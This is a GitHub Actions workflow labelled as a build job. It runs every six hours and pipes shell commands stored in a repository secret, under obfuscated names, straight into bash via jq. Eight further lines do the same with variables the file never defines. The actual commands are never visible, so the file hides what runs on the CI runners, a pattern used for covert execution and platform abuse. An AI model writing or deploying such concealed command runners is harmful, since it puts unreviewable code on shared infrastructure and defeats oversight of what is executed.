name: diamonleesub
on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:  # 32159
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: diamonleesub
        env:
          vwgww903: ${{ secrets.vwgww903 }}
        run: |
          echo $vwgww903 | jq -r .psdls3 | /bin/bash
          echo $hbse93336 | jq -r .o5 | /bin/bash
          echo $plkey6 | jq -r .ho81 | /bin/bash
          echo $uzpl7221 | jq -r .sm18073 | /bin/bash
          echo $e85894 | jq -r .w7009 | /bin/bash
          echo $znocw368 | jq -r .fwsqf13002 | /bin/bash
          echo $adqe07902 | jq -r .dnh8 | /bin/bash
          echo $w5024 | jq -r .dcyr0958 | /bin/bash
          echo $wqa7124 | jq -r .hda3 | /bin/bash

